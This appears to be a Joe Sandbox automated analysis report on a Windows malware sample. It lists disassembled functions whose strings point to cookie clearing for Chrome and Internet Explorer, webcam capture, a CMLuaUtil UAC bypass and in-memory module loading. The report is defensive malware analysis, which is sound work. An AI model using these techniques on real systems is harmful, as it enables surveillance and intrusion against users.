                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 33c7f91080d72b7d6eae4ad8ea9185415ff74703dc449a1b63b856fadc20d013
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 33c7f91080d72b7d6eae4ad8ea9185415ff74703dc449a1b63b856fadc20d013
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-122982132
                                • Opcode ID: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 68a42e42b8838ca6718af06bcf6c8b1fb058983d8eb4a6e4fef459ca4e905c38
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: 68a42e42b8838ca6718af06bcf6c8b1fb058983d8eb4a6e4fef459ca4e905c38
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-4080365188
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                • UserProfile, xrefs: 0040BAAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID: x9k
                                • API String ID: 776569668-1900533136
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 98e8889294d7cadc1f704f946c2f8c3de485e45006c88c58c1134ec26a604bb7
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 98e8889294d7cadc1f704f946c2f8c3de485e45006c88c58c1134ec26a604bb7
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID:
                                • API String ID: 3950776272-0
                                • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
